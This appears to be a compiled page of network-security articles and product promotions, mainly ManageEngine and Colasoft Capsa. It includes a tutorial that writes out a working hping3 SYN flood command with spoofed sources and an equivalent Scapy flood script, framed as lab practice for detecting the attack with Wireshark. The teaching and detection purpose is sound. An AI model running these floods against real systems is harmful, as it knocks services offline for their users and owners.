Wireless LAN Controllers (WLC) and Wireless Access Points (WAP) form the backbone of a wireless network. It is imperative to monitor them proactively so that any performance issue can be resolved before it grows and impacts users. Critical metrics such as SNR and SINR also have to be monitored in real time so that any degradation in signal strength can be quickly identified and fixed. Heat maps play a critical role in visually representing signal strength across the floor. Make use of such heat maps and display them on NOC screens so that any signal problem can be spotted in real time.

Having strict firewall and security policies, combined with effective firewall management, protects enterprises from attacks and hacks caused by hackers and shadow IT. To solve bandwidth-related issues, network admins can use traffic shaping techniques to prioritize bandwidth for business-critical apps. This avoids frequently buying additional bandwidth and helps provide adequate bandwidth for business-critical apps and minimal bandwidth for non-critical apps.

Doing all of this manually would be highly cumbersome. Look for tools or solutions that offer proactive monitoring of wireless networks, provide heat maps to identify and measure Wi-Fi signal strength, manage firewall configurations and policies, and troubleshoot bandwidth-related issues. With such a solution and strict security policies in place, you can make your network ready for mobile devices.

ManageEngine OpManager is one such network management software package that offers increased visibility and control over your network. Out of the box it offers network monitoring, physical and virtual server monitoring, flow-based bandwidth analysis, firewall log analysis and archiving, configuration and change management, and IP address and switch port management, in one single executable. You can also monitor Wi-Fi signal strength with it.

Managing Complex Firewall Security Policies

Challenges & Solutions to Managing Firewall Rules in Complex Network Environments

In today's interconnected digital landscape, where businesses rely heavily on networked systems and the internet for their operations, the importance of cybersecurity cannot be overstated. Among the essential tools in a cybersecurity arsenal, firewalls stand as a frontline defense against cyber threats and malicious actors.

One of the primary functions of a firewall is to filter traffic, which entails scrutinizing packets of data to determine whether they meet the criteria set by the organization's security policies. This process involves examining various attributes of the data packets, such as source and destination IP addresses, port numbers, and protocols. By enforcing these rules, firewalls can thwart a wide range of cyber threats, including unauthorized access attempts, malware infections, denial-of-service attacks and more.
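
As a conceptual illustration of this filtering process (not the implementation of any particular vendor's firewall), the Python sketch below evaluates a packet's source, destination, protocol and destination port against an ordered rule list, where the first match wins and anything unmatched is implicitly denied. The rules and addresses are made-up examples:

# Conceptual first-match packet filter: ordered rules with an implicit deny.
# The rules and the packets tested below are made-up examples.
from ipaddress import ip_address, ip_network

RULES = [
    # (action, source network, destination network, protocol, destination port)
    ("deny",   "0.0.0.0/0",      "10.0.0.0/8",   "tcp", 23),    # block Telnet
    ("permit", "192.168.1.0/24", "10.0.10.5/32", "tcp", 443),   # HTTPS to a server
    ("permit", "192.168.1.0/24", "0.0.0.0/0",    "udp", 53),    # DNS out
]

def evaluate(src: str, dst: str, proto: str, dport: int) -> str:
    for action, src_net, dst_net, r_proto, r_port in RULES:
        if (ip_address(src) in ip_network(src_net)
                and ip_address(dst) in ip_network(dst_net)
                and proto == r_proto and dport == r_port):
            return action          # first matching rule decides
    return "deny"                  # implicit deny if nothing matched

print(evaluate("192.168.1.20", "10.0.10.5", "tcp", 443))   # permit
print(evaluate("192.168.1.20", "10.0.10.5", "tcp", 23))    # deny (rule 1)
print(evaluate("192.168.1.20", "8.8.8.8",   "tcp", 80))    # deny (implicit)

Real firewall policies contain hundreds or thousands of such rules, which is exactly where ordering mistakes, shadowed rules and redundancies creep in.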

Enforcing and managing firewall rules effectively can be a daunting task, particularly in complex network environments with numerous rules, policies and configurations. While solutions like ManageEngine Firewall Analyzer step in to offer a comprehensive way to streamline firewall rule management and enhance security posture, it is worthwhile to take a look at the real challenges firewall rule management presents across all well-known platforms such as Cisco (FTD, Firepower, ASA), Palo Alto Next-Gen firewalls, Check Point, Fortinet, Juniper and more.

Key Topics:

Challenges with Firewall Rule Management

Dealing with Security Audit Challenges

Dealing with Security Audit Challenges: Discovering vulnerabilities, unauthorized access, optimize network security & reporting

The utilization of log analyzers, such as Firewall Analyzer, in network infrastructure plays a pivotal role in enhancing cybersecurity and fortifying the overall security posture of an organization. Security audits, facilitated by log analyzers, serve as a critical mechanism for systematically reviewing and analyzing recorded events within the network.

This proactive approach enables the identification of potential security risks, unauthorized access attempts, and abnormal activities that might signify a breach. The log analyzer sifts through vast amounts of data & logs, providing insights into patterns and anomalies that might go unnoticed otherwise.

By uncovering vulnerabilities and irregularities, organizations can take timely corrective actions, preventing potential security breaches. Moreover, the information gleaned from these audits is instrumental in formulating a comprehensive security strategy that extends across the entire network infrastructure.

ManageEngine Firewall Analyzer dashboard

This strategic approach ensures a holistic defense against cyber threats, fostering a resilient and adaptive cybersecurity framework that aligns with the evolving landscape of security challenges.

This article will delve into the concept of security audits and how a product like Firewall Analyzer can streamline this crucial procedure.

Key Topics:

Download your copy of ManageEngine's popular Firewall Analyzer here.

Security Audits Explained

Compliance in a Hybrid Work Environment

Ensuring Compliance and Business Continuity in a Hybrid Work Environment

In the wake of digital transformation, the work landscape as we know it has undergone a dynamic shift. People can now work from home, from the office, or anywhere with a stable internet connection. Organizations have gradually started to adopt this seamless blend of remote work and on-site engagement, labeled hybrid work.

According to the digital readiness survey by ManageEngine, remote work will have a lasting impact, with 96% of organizations stating that they will be supporting remote workers for at least the next two years. While the remote working model offers significant advantages to employees, such as a better work-life balance, it presents significant challenges for organizations in extending office-like network security.

To ensure the success of hybrid work, every organization should address challenges related to security, compliance, and data protection. This article delves into the risks and issues associated with ensuring compliance in a hybrid work environment. Let's dive in.

Key Topics:

Network Compliance in a Hybrid Work Environment

Compliance refers to the adherence of an organization's infrastructure, configuration, and policies to industry standards. In a hybrid work environment where employees are working away from the office, it becomes difficult to ensure compliance. To overcome this, companies are employing a range of smart monitoring systems to make sure they stay compliant with industry norms.

Besides legal obligation, compliance also helps in safeguarding networks from security incidents such as breach attempts, overlooked vulnerabilities, and other operational inefficiencies.

Consequences of Compliance Violations

Non-compliance, which refers to the failure to adhere to laws, regulations, or established guidelines, can have a wide range of repercussions that vary depending on several factors. The severity of these consequences is often determined by the nature and extent of the violation, the specific mandate or regulation that has been breached, and the subsequent impact on various stakeholders involved. Here, we delve into the potential consequences of non-compliance in more detail:

Firewall Analyzer Management Tool

Discover the Ultimate Firewall Management Tool: 7 Essential Features for Unleashing Unrivaled Network Security!

Firewall security management is a combination of monitoring, configuring, and managing your firewall to make sure it runs at its best to effectively ward off network security threats. In this article, we will explore the seven must-have features of a firewall security management tool and introduce Firewall Analyzer, a popular Firewall Management Tool that has set the golden standard in Firewall Management across all vendors of firewall and security products. Furthermore, we'll explain how central firewall policy management, VPN management, log analysis, log retention, compliance management and threat identification/forensics help create a robust cybersecurity and network security posture that increases your organization's ability to protect its networks, information, and systems from threats.

The seven must-have features of a firewall security management tool are:

  1. Firewall Policy Management
  2. VPN Management
  3. Firewall Change Management
  4. Compliance Management
  5. Log Analysis & Threat Identification
  6. Log Retention & Forensics
  7. Network Security Alerts

Let’s take a look at each of these features and provide examples that showcase their importance.

Firewall Policy Management

This is the process of managing and organizing your firewall rules. These firewall rules and policies dictate the traffic that is entering and exiting your network, and can also be used to block illegitimate traffic.

Why is this important? Effective firewall policy management ensures firewall policies never become outdated, redundant, or misconfigured, which would otherwise leave the network open to attacks.

One of the primary challenges in firewall policy management is the potential for human error. Configuring firewall rules and policies requires a deep understanding of network architecture, application requirements, and security best practices. Unfortunately, even experienced IT professionals can make mistakes due to various factors, such as time constraints, lack of communication, or a misunderstanding of the network's specific needs.

Different individuals within an organization may also have different levels of expertise and understanding when it comes to firewall policies. This diversity in knowledge and experience can lead to inconsistencies, redundant rules, or conflicting configurations, compromising the firewall's overall effectiveness.

Taking proactive steps to manage firewall policies effectively can significantly enhance an organization's security posture and protect valuable assets from potential breaches and cyberattacks. This is where solutions such as Firewall Analyzer can take on the burden of managing firewall policies through an intuitive, simplified and easy-to-follow interface, no matter which firewall vendor you are dealing with.

A few of the key features offered by Firewall Analyzer include:

  • Gain enhanced visibility on all the rules in your firewall and a comprehensive understanding of your security posture.
  • Quickly identify and record anomalies in redundant, generalized, correlated, shadowed, or grouped rules.
  • Analyze firewall policies and get suggestions on changes to rule order to optimize performance.
  • Simplify the rule creation, modification, and deletion process.
  • Check the impact of a new rule on the existing rule set.

Hacker attacking Microsoft AD

Free eBook Reveals Hackers Latest Attack Methods Against Microsoft’s Active Directory

Are you ready to uncover the hidden vulnerabilities in your Active Directory (AD) environment and learn how to fortify your defenses against modern cyber threats? This comprehensive, free eBook delves deep into the critical aspects of AD security, presenting real-world attack scenarios and actionable defense strategies. Whether you're an IT administrator, security professional, or tech enthusiast, this resource is your gateway to a more secure IT infrastructure.

Active Directory cyber security attacks

Highlights from the eBook:

  • Understanding Active Directory Vulnerabilities: Gain a clear understanding of the common weaknesses in AD setups that hackers exploit, and how they can lead to devastating breaches.
  • LLMNR/NBT-NS Poisoning Attacks Explained: Discover how attackers manipulate name resolution protocols to intercept sensitive data and compromise systems, and learn how to prevent these tactics.
  • Defending Against SMB Relay Attacks: Learn about the mechanisms of SMB relay attacks and implement strategies to close off this dangerous avenue of attack.
  • Protecting Against Kerberoasting Attacks: Get insights into the devastating power of kerberoasting, where attackers exploit service accounts to steal credentials—and how to shield your AD from this menace.
  • Demystifying Domain Enumeration: Understand how attackers map out your domain to locate vulnerabilities, and explore countermeasures to disrupt their reconnaissance efforts.
  • Brute Force and Password Spray Attacks: Break down these relentless attack techniques and arm yourself with tools and practices to safeguard your credentials and networks.
  • Top 10 Active Directory Defense Techniques: From enforcing least-privilege principles to advanced monitoring, these strategies empower you to build a strong and resilient AD environment.

Hacker attacking Microsoft Active Directory

This eBook is a comprehensive guide designed to help you strengthen your AD defenses, improve incident detection, and protect your organization from emerging threats. With detailed explanations, step-by-step countermeasures, and expert insights, you’ll be equipped to identify vulnerabilities and implement effective security measures.

Don’t let your Active Directory become an easy target. Download the free eBook now to gain the knowledge and tools you need to stay one step ahead of attackers and secure your network!

Windows Server EventLog Analyzer

Unlock Deep Visibility & Insight into Windows Server 2022 Logs

This article explores the exciting new features of Windows Server 2022 and emphasizes the critical role of analyzing Windows Server logs. You'll also discover how EventLog Analyzer provides comprehensive visibility and helps you achieve 360-degree protection against threats targeting these logs, ensuring robust security for your server environment.

Key Topics:

Download your copy of EventLog Analyzer

Related Articles:

The Importance of Proactive Log Management

Did you know that threats targeting Windows Server and its logs are becoming more significant? To protect your systems, you must monitor and analyze these logs effectively. Ensuring system security, compliance, and health requires effective log management.

Administrators can ensure optimal performance by promptly identifying and resolving issues through routine log review. Log analysis also protects sensitive data by assisting in the detection of any security breaches and unwanted access. Proactive log management ultimately improves the security and dependability of the IT infrastructure as a whole.

EventLog Analyzer monitors various Windows event logs, such as security audit, account management, system, and policy change event logs. The insights gleaned from these logs are displayed in the forms of comprehensive reports and user-friendly dashboards to facilitate the proactive resolution of security issues.

Windows Server 2022 and its Key Features

Windows Server 2022 is a server operating system developed by Microsoft as a part of the Windows New Technology family. It is the most recent version of the Windows Server operating system, having been released in August 2021. Large-scale IT infrastructures can benefit from the enterprise-level administration, storage, and security features offered by Windows Server 2022. Compared to its predecessors, it has various new and improved capabilities, with an emphasis on application platform advancements, security, and hybrid cloud integrations.

Let’s take a look at a few key features of Windows Server 2022:

  • Cutting-edge security features, such as firmware protection, virtualization-based security, hardware roots of trust, and secured-core servers, that protect against complex attacks.
  • Improved management and integrations with Azure services via Azure Arc's support for hybrid cloud environments.
  • New storage features, which include Storage Migration Service enhancements, support for larger clusters, and improvements to Storage Spaces Direct.
  • Enhancements to Kubernetes, container performance, and Windows containers in Azure Kubernetes Service to improve support for containerized applications.
  • Support for more powerful hardware configurations, including more memory and CPU capacity, with enhanced performance for virtualized workloads.
  • File size reductions during transfers to increase efficiency and speed through the use of Server Message Block (SMB) compression.
  • An integration with Azure Automanage for easier deployment, management, and monitoring of servers in hybrid and on-premises environments.
  • Improved networking features, such as enhanced network security and performance as well as support for DNS over HTTPS.
  • Enhanced VPN and hybrid connectivity options, such as an SMB over QUIC capability that permits safe, low-latency file sharing over the internet.
  • Improvements to Windows Subsystem for Linux and tighter integration for cross-platform management, which provides better support for executing Linux workloads.
  • A range of flexible deployment and licensing options, such as the usage of Azure's subscription-based licensing.
  • Support for modernizing existing .NET applications and developing new applications using the latest .NET 5.0 technologies.
  • Enhanced automation capabilities with the latest version of PowerShell, PowerShell 7.

Understanding Windows Server Logs

Windows Server event logs are records of events that occur within the operating system or other software running on a Windows server. You can manage, observe, and troubleshoot the server environment with the help of these logs. The logs capture numerous pieces of information, such as application problems, security incidents, and system events. By examining and evaluating these logs, administrators can ensure the security, functionality, and health of the server.
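
As a small illustration of programmatic access to these logs (separate from EventLog Analyzer itself), the hedged Python sketch below uses the pywin32 package to read a batch of recent Security log entries on the local server and print failed logons, event ID 4625. It assumes pywin32 is installed and that the script runs with sufficient privileges:

# Read recent Windows Security log entries and print failed logons (event ID 4625).
# Requires the pywin32 package and sufficient privileges; a minimal sketch only.
import win32evtlog

SERVER = None            # None = local machine
LOG_TYPE = "Security"    # other examples: "System", "Application"

handle = win32evtlog.OpenEventLog(SERVER, LOG_TYPE)
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | win32evtlog.EVENTLOG_SEQUENTIAL_READ

events = win32evtlog.ReadEventLog(handle, flags, 0)   # one batch of recent events
for event in events:
    event_id = event.EventID & 0xFFFF                 # strip severity/facility bits
    if event_id == 4625:                              # 4625 = failed logon attempt
        print(event.TimeGenerated, event.SourceName, event_id)

win32evtlog.CloseEventLog(handle)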

Windows Server Threat Detection

Detecting Windows Server Security Threats with Advanced Event Log Analyzers

Windows Servers stand as prime targets for hackers and malicious actors due to their widespread usage and historical vulnerabilities. These systems often serve as the backbone for critical business operations, housing sensitive data and facilitating essential services. However, their prevalence also makes them vulnerable to cyber threats, including ransomware attacks, distributed denial-of-service (DDoS) assaults and more.

Windows Servers have a documented history of vulnerabilities and exploits, which further intensifies their attractiveness to attackers seeking to exploit weaknesses for unauthorized access or data theft. Consequently, it is paramount for organizations to prioritize mitigating these risks and safeguarding the integrity and continuity of operations within Windows Server environments.

Fortunately, tools like EventLog Analyzer offer robust capabilities for automatically identifying and countering such threats, uplifting the security posture of Windows Server setups. To effectively leverage these defenses, it's imperative to understand the nature of common Windows server threats and how they manifest. In this document, we delve into several prevalent threats targeting Windows servers and outline strategies for their detection and mitigation.

Furthermore, implementing robust security measures, such as regular patching, network segmentation, intrusion detection systems, data encryption, and Windows VM backups, is essential to fortify Windows Servers against potential threats and ensure the resilience of critical business functions.

Key Topics:

Download now the world’s leading Event Log Management System.

Common Windows Server Threats


Event Log Monitoring System

Event Log Monitoring System: Implementation, Challenges & Standards Compliance. Enhance Your Cybersecurity Posture

An event log monitoring system, often referred to as event log management, is a critical component of IT security and management that helps organizations strengthen their cybersecurity posture. It is a sophisticated software solution designed to capture, analyze, and interpret the vast array of event logs generated by various components within an organization's IT infrastructure, such as firewalls (Cisco ASA, Palo Alto, etc.), routers, switches, wireless controllers, Windows servers, Exchange servers and more.

These event logs can include data on user activities, system events, network traffic, security incidents and more. By centralizing and scrutinizing these logs in real time, event log monitoring systems play a pivotal role in enhancing an organization's security posture, enabling proactive threat detection, and facilitating compliance with regulatory requirements.

Key Topics:

Event Log Categories

Event log monitoring systems empower organizations to identify and respond to potential security threats, operational issues, and compliance breaches promptly, making them an indispensable tool for maintaining the integrity and reliability of modern digital ecosystems.

All logs contain the following basic information:


How to Perform TCP SYN Flood DoS Attack & Detect it with Wireshark - Kali Linux hping3

This article will help you understand TCP SYN Flood Attacks, show how to perform a SYN Flood Attack (DoS attack) using Kali Linux & hping3 and correctly identify one using the Wireshark protocol analyser. We’ve included all necessary screenshots and easy to follow instructions that will ensure an enjoyable learning experience for both beginners and advanced IT professionals.

DoS attacks are simple to carry out, can cause serious downtime, and aren’t always obvious. In a SYN flood attack, a malicious party exploits the TCP protocol’s 3-way handshake to quickly cause service and network disruptions, ultimately leading to a Denial of Service (DoS) attack. These types of attacks can easily take admins by surprise and can be challenging to identify. Luckily, tools like Wireshark make it easy to capture and verify any suspicions of a DoS attack.

Key Topics:

There’s plenty of interesting information to cover so let’s get right into it.

How TCP SYN Flood Attacks Work

When a client attempts to connect to a server using the TCP protocol, e.g. HTTP or HTTPS, it is first required to perform a three-way handshake before any data is exchanged between the two. Since the three-way TCP handshake is always initiated by the client, it sends a SYN packet to the server.

 tcp 3 way handshake

The server next replies, acknowledging the request and at the same time sending its own SYN request – this is the SYN-ACK packet. Finally, the client sends an ACK packet, which confirms that both hosts agree to create a connection. The connection is therefore established and data can be transferred between them.

Read our TCP Overview article for more information on the 3-way handshake

In a SYN flood, the attacker sends a high volume of SYN packets to the server using spoofed IP addresses, causing the server to send a reply (SYN-ACK) and leave its ports half-open, awaiting a reply from a host that doesn’t exist:

Performing a TCP SYN flood attack

In a simpler, direct attack (without IP spoofing), the attacker will simply use firewall rules to discard SYN-ACK packets before they reach him. By flooding a target with SYN packets and not responding (ACK), an attacker can easily overwhelm the target’s resources. In this state, the target struggles to handle traffic, which in turn increases CPU usage and memory consumption, ultimately leading to the exhaustion of its resources (CPU and RAM). At this point the server will no longer be able to serve legitimate client requests, resulting in a Denial of Service.

How to Perform a TCP SYN Flood Attack with Kali Linux & hping3

To test whether you can detect this type of DoS attack, you must be able to perform one. The simplest way is via Kali Linux, and more specifically hping3, a popular TCP penetration testing tool included in Kali Linux.

Alternatively Linux users can install hping3 in their existing Linux distribution using the command:

# sudo apt-get install hping3

In most cases, attackers will use hping or another tool to spoof random IP addresses, so that’s what we’re going to focus on. The line below lets us start and direct the SYN flood attack at our target (192.168.1.159):

# hping3 -c 15000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.159

Let’s explain in detail the above command:

We’re sending 15000 packets (-c 15000) at a size of 120 bytes (-d 120) each. We’re specifying that the SYN flag (-S) should be enabled, with a TCP window size of 64 (-w 64). To direct the attack to our victim’s HTTP web server we specify port 80 (-p 80) and use the --flood flag to send packets as fast as possible. As you’d expect, the --rand-source flag generates spoofed IP addresses to disguise the real source and avoid detection, but at the same time it stops the victim’s SYN-ACK reply packets from reaching the attacker.
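
For readers who prefer Python, a roughly equivalent (though much slower) flood can be sketched with Scapy. The target address and port mirror the hping3 example above; as with hping3, run this only against lab equipment you own:

# Rough Scapy equivalent of the hping3 flood above -- lab use only.
# Scapy is far slower than hping3's --flood mode, but the packets are comparable.
from scapy.all import IP, TCP, RandIP, RandShort, send

TARGET = "192.168.1.159"           # same lab victim as in the hping3 example

for _ in range(15000):             # like -c 15000
    pkt = (IP(src=RandIP(), dst=TARGET) /              # spoofed random source
           TCP(sport=RandShort(), dport=80, flags="S", window=64))
    send(pkt, verbose=False)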

How to Detect a SYN Flood Attack with Wireshark

Now that the attack is in progress, we can attempt to detect it. Wireshark is a little more involved than other commercial-grade software. However, it has the advantage of being completely free, open-source, and available on many platforms.

In our lab environment, we used a Kali Linux laptop to target a Windows 10 desktop via a network switch. Though the structure is insecure compared to many enterprise networks, an attacker could likely perform similar attacks after some sniffing. Recalling the hping3 command, we also used random IP addresses, as that’s the method attackers with some degree of knowledge will use.

Even so, SYN flood attacks are quite easy to detect once you know what you’re looking for. As you’d expect, a big giveaway is the large amount of SYN packets being sent to our Windows 10 PC.

Straight away, though, admins should be able to note the start of the attack by a huge flood of TCP traffic. We can filter for SYN packets without an acknowledgment using the following filter:  tcp.flags.syn == 1 and tcp.flags.ack == 0

tcp syn flood attack detection with wireshark

As you can see, there’s a high volume of SYN packets with very little variance in time. Each SYN packet shows it’s from a different source IP address with a destination port 80 (HTTP), identical length of 120 and window size (64). When we filter with tcp.flags.syn == 1 and tcp.flags.ack == 1 we can see that the number of SYN/ACKs is comparatively very small. A sure sign of a TCP SYN attack.
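
The same comparison can be scripted. Assuming the capture has been saved to a pcap file (the filename below is a placeholder), a short Scapy script can count SYNs versus SYN-ACKs and flag the lopsided ratio, mirroring the two Wireshark filters above:

# Count SYN vs SYN-ACK packets in a saved capture -- the same check as the
# two Wireshark display filters above. The pcap filename is a placeholder.
from scapy.all import rdpcap, TCP

SYN, ACK = 0x02, 0x10
syn = synack = 0

for pkt in rdpcap("syn_flood_capture.pcap"):
    if TCP not in pkt:
        continue
    flags = int(pkt[TCP].flags)
    if flags & SYN and not flags & ACK:
        syn += 1                           # SYN without ACK
    elif flags & SYN and flags & ACK:
        synack += 1                        # SYN-ACK

print(f"SYN: {syn}, SYN-ACK: {synack}")
if syn > 1000 and (synack == 0 or syn / synack > 100):   # arbitrary lab threshold
    print("SYN to SYN-ACK ratio is consistent with a SYN flood")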

tcp syn flood attack detection with wireshark

We can also view Wireshark’s graphs for a visual representation of the uptick in traffic. The I/O graph can be found via the Statistics>I/O Graph menu. It shows a massive spike in overall packets from near 0 to up to 2400 packets a second.

tcp syn flood attack wireshark graph

By removing our filter and opening the protocol hierarchy statistics, we can also see that there has been an unusually high volume of TCP packets:

tcp syn flood attack wireshark protocol hierarchy stats

All of these metrics point to a SYN flood attack with little room for interpretation. By use of Wireshark, we can be certain there’s a malicious party and take steps to remedy the situation.

Summary

In this article we showed how to perform a TCP SYN Flood DoS attack with Kali Linux (hping3) and use the Wireshark network protocol analyser filters to detect it. We also explained the theory behind TCP SYN flood attacks and how they can cause Denial-of-Service attacks.


How to Detect SYN Flood Attacks with Capsa Network Protocol Analyzer & Create Automated Notification Alerts

This article explains how to detect a SYN Flood Attack using an advanced protocol analyser like Colasoft Capsa. We’ll show you how to identify and inspect abnormal traffic spikes, drill into captured packets and identify evidence of flood attacks. Furthermore we’ll configure Colasoft Capsa to automatically detect SYN Flood Attacks and send automated alert notifications.

Denial-of-Service (DoS) attacks are one of the most persistent attacks network admins face due to the ease with which they can be carried out. With a couple of commands, an attacker can create a DoS attack capable of disrupting critical network services within an organization.

There are a number of ways to execute a DoS attack, including ARP poisoning, Ping Flood, UDP Flood, Smurf attack and more but we’re going to focus on one of the most common: the SYN flood (half-open attack). In this method, an attacker exploits the TCP handshake process.

In a regular three-way TCP handshake, the user sends a SYN packet to a server, which replies with a SYN-ACK packet. The user replies with a final ACK packet, completing the process and establishing the TCP connection, after which data can be transferred between the two hosts:

tcp 3 way handshake

However, if a server receives a high volume of SYN packets and no replies (ACK) to its SYN-ACK packets, the TCP connections remain half-open, with the server assuming the missing replies are due to natural network congestion:

syn flood attack

By flooding a target with SYN packets and not responding (ACK), an attacker can easily overwhelm the target’s available ports. In this state, the target struggles to handle traffic, which in turn increases CPU usage and memory consumption, ultimately leading to the exhaustion of its resources (CPU and RAM). At this point the server will no longer be able to serve legitimate client requests, resulting in a Denial of Service.

Detecting & Investigating Unusual Network Traffic

Fortunately, there are a number of software tools that can detect SYN Flood attacks. Wireshark is a strong, free solution, but the paid versions of Colasoft Capsa make it far easier and quicker to detect and locate network attacks. Graph-oriented displays and clever features make it simple to diagnose issues.

As such, the first port of call for detecting a DoS attack is the dashboard. The overview of your network will make spikes in traffic quickly noticeable. You should be able to notice an uptick in the global utilization graph, as well as the total traffic by bytes:

tcp syn flood attack packet analyzer dashboard

However, spikes in network utilization can happen for many reasons, so it’s worth drilling down into the details. Capsa makes this very easy via its Summary tab, which will show packet size distribution, TCP conversation count, and TCP SYN/SYN-ACK sent.

In this case, there’s an abnormal number of packets in the 128-255 range, but admins should look out for strange distributions under any heading as attackers can specify a packet size to suit their needs. However, a more telling picture emerges when looking at TCP SYN Sent, which is almost 4000 times that of SYN-ACK:

tcp syn flood attack packet analysis

Clearly, there’s something wrong here, but it’s important to find the target of the SYN packets and their origin.

There are a couple of ways to do this, but the TCP Conversation tab is easiest. If we sort by TCP, we can see that the same 198-byte packet is being sent to our victim PC on port 80:

tcp syn flood attack packet analysis

After selecting one of these entries and decoding the packets, you may see the results below. There have been repeated SYN packets and the handshake isn’t performed normally in many cases:

tcp syn flood flow analysis

The attack becomes most clear when viewing IP Conversation in Capsa’s Matrix view, which reveals thousands of packets sent to our victim PC from random IP addresses. This is due to the use of IP spoofing to conceal their origin. If the attacker isn’t using IP spoofing, Capsa’s Resolve address will be able to resolve the IP address and provide us with its name. If they are, finding the source is likely far more trouble than it’s worth:

tcp syn flood attack matrix

At this point, we can be certain that an SYN flood attack is taking place, but catching such attacks quickly really pays. Admins can use Capsa’s Alarm Explorer to get an instant notification when unusual traffic is detected:

tcp syn flood attack alarm creation

A simple counter triggers a sound and email when a certain number of SYN packets per second are detected. We set the counter to 100 to test the functionality and Capsa immediately sent us an alert once we reached the configured threshold:

tcp syn flood attack alarm

Capsa also lets users set up their own pane in the dashboard, where you can display useful graphs like SYN sent vs SYN-ACK, packet distribution, and global utilization. This should make it possible to check for a SYN flood at a glance when experiencing network slowdowns:

tcp syn flood attack packet analysis dashboard

Alternatively, Capsa’s Enterprise Edition lets admins start a security analysis profile, which contains a dedicated DoS attack tab. This will automatically list victims of an SYN flood attack and display useful statistics like TCP SYN received and sent. It also allows for quick access to TCP conversation details, letting admins decode quickly and verify attacks:

tcp syn flood attack tab


Together, these techniques should be more than enough to catch SYN floods as they start and prevent lengthy downtime.

Summary

This article explained how SYN Flood Attacks work and showed how to detect SYN Flood attacks using Colasoft Capsa. We saw different ways to identify abnormal traffic spikes within the network, how to drill into packets and find evidence of possible attacks. Finally we showed how Capsa can be configured to automatically detect SYN Flood Attacks and create alert notifications.


Advanced Network Protocol Analyzer Review: Colasoft Capsa Enterprise 11

Firewall.cx has covered Colasoft Capsa several times in the past, but its constant improvements make it well worth revisiting. Since the last review, the version has bumped from 7.6.1 to 11.1.2+, keeping a similar interface but scoring plenty of new features. In fact, its change is significant enough to warrant a full re-evaluation rather than a simple comparison.

For the unfamiliar, Colasoft Capsa Enterprise is a widely respected network protocol analyzer that goes far beyond free packet sniffers like Wireshark. It gives users detailed information about packets, conversations, protocols, and more, while also tying in diagnosis and security tools to assess network health. It was named as a visionary in Gartner’s Magic Quadrant for Network Performance Monitoring and Diagnostics in 2018, which gives an idea of its power. Essentially, it’s a catch-all for professionals who want a deeper understanding of their network.

Installing Capsa Enterprise 11

The installation of Capsa Enterprise is a clear merit, requiring little to no additional configuration. The installer comes in at 84 MB, a very reasonable size that will be quick to download on most connections. From there, it’s a simple case of pressing Next a few times.

However, Colasoft does give additional options during the process. There’s the standard ability to choose the location of the install, but also choices of a Full, Compact, or Custom install. It lets users remove parts of the network toolset as required to reduce clutter or any other issues. Naturally, Firewall.cx is looking at the full capabilities for the purpose of this review.

capsa enterprise v11 installation options

The entire process takes only a few minutes, with Capsa automatically installing the necessary drivers. Capsa does prompt a restart after completion, though it can be accessed before then to register a serial number. The software offers both an online option for product registration and an offline process that makes use of a license file. It’s a nice touch that should appease the small percentage of users without a connection.

Using Capsa Enterprise 11

After starting Capsa Enterprise for the first time, users are presented with a dashboard that lets them choose a network adapter, select an analysis profile, or load packet files for replay. Selecting an adapter reveals a graph of network usage over time to make it easier to discern the right one. A table above reveals the speed, number of packets sent, utilization, and IP address to make that process even easier.

capsa enterprise v11 protocol analyzer dashboard

 However, it’s after pressing the Start button that things get interesting. As data collection begins, Capsa starts to display it in a digestible way, revealing live graphs with global utilization, total traffic, top IP addresses, and top application protocols.

capsa enterprise v11 dashboard during capture

Users can customize this default screen to display most of the information Capsa collects, from diagnoses to HTTP requests, security alarms, DNS queries, and more. Each can be adjusted to update at an interval from 1 second to 1 hour, with a choice between area, line, pie, and bar charts. The interface isn’t the most modern we’ve seen, but it’s hard to ask for more in terms of functionality.

Like previous versions, Capsa Enterprise 11 also presents several tabs and sub-tabs that provide deeper insights. A summary tab gives a full statistical analysis of network traffic with detailed metadata. A diagnosis tab highlights issues your network is having on various layers, with logs for each fault or performance issue.

In fact, the diagnosis tab deserves extra attention as it can also detect security issues. It’s a particular help with ARP poisoning attacks due to counts of invalid ARP formats, ARP request storms, and ARP scans. After clicking on the alert, admins can see the originating IP and MAC address and investigate.

capsa enterprise v11 diagnosis tab

When clicking on the alert, Capsa also gives possible causes and resolutions, with the ability to set up an alarm in the future via sound or email. An alarm explorer sub-menu also gives an overview of historic triggers for later review. To reduce spam, you can adjust your alarms or filter specific errors out of the diagnosis system.

capsa enterprise v11 analysis profile setting

Naturally, this is a great help, and the ability to define such filters is present in every aspect of the software. You can filter by IP, MAC address, and issue type, as well as more complex filters. Admins can remove specific traffic either at capture or afterward. Under Packet Analysis, for example, you can reject specific protocols like HTTP, Broadcast, ARP, and Multicast.

capsa enterprise v11 packet analysis filters

If you filter data you’ve already captured, it gets even more powerful, letting you craft filters for MAC addresses in specific protocols, or use an advanced flowchart system to include certain time frames. The massive level of control makes it far easier to find what you’re looking for.

After capture is complete, you can also hit the Conversation Filter button, a powerful tool that lets you accept/reject data in the IP, TCP, and UDP Conversations tabs. Again, it takes advantage of a node-based editor plus AND/OR/NOT operators for easy creation. You can even export the filters for use on a different PC.

capsa enterprise v11 adding conversation filter

When you begin a capture with conversation filters active, Capsa will deliver a pop-up notification. This is a small but very nice touch that should prevent users wondering why only certain protocols or locations are showing.

capsa enterprise v11 packet capture filter us traffic

Once enabled, the filter will begin adjusting the data in the tab of the selected conversation type. Admins can then analyze at will, with the ability to filter by specific websites and look at detailed packet information.

capsa enterprise v11 ip conversation tab

The packet analysis window gives access to further filters, including address, port, protocol, size, pattern, time, and value. You can also hit Ctrl+F to search for specific strings in ASCII, HEX, and UTF, with the ability to choose between three layout options.

capsa enterprise v11 packet capture filter analysis

However, though most of your time will be spent in Capsa’s various details, its toolbar is worth a mention. Again, there’s a tabbed interface, the default being Analysis. Here you’ll see buttons to stop and start capture, view node groups, set alarms for certain diagnoses, set filters, and customize the UI.

capsa enterprise v11 dashboard v2

However, most admins will find themselves glancing at it for its pps, bps, and utilisation statistics. These update every second and mean you can get a quick overview no matter what screen you’re on. It combines with a clever grid-based display for the packet buffer, which can be quickly exported for use in other software or for replays.

Another important section is the Tools tab, which gives access to Capsa’s Base64 Codec, Ping, Packet Player, Packet Builder, and MAC Scanner applications. These can also be accessed via the file menu in the top left but having them for quick access is a nice touch.

capsa enterprise v11 tools

